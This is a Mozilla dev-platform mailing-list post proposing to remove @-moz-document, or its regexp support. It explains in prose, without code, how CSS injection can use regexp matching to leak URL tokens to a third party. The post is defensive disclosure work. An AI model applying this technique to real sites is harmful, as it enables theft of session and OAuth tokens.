Summary: Attackers can extract secret URL components (e.g. session IDs, oauth tokens) using @-moz-document. Using the regexp support and assuming a CSS injection (no XSS needed!), the attacker can probe the current URL with some regular expressions and send the URL parameters to a third party.
A demo of this exploit can be found at <http://html5sec.org/cssession/>. This attack has also been published in the academic paper "Scriptless Attacks: Stealing the pie without touching the sill"[1] by Mario Heiderich et al. and numerous other presentations on this topic [2,3]. My suggestion is to either kill -moz-document for public web content or remove regexp support. What do you think? Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1035091 Spec: n/a. This was pushed out of CSS3 and did not make it to CSS4 selectors. MDN: https://developer.mozilla.org/en-US/docs/Web/CSS/@document Target release: ?? Platform coverage: desktop, android [1] http://www.nds.rub.de/research/publications/scriptless-attacks/ [2] http://www.slideshare.net/x00mario/stealing-the-pie [3] https://speakerdeck.com/mikewest/xss-no-the-other-s-cssconf-eu-2013 _______________________________________________ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
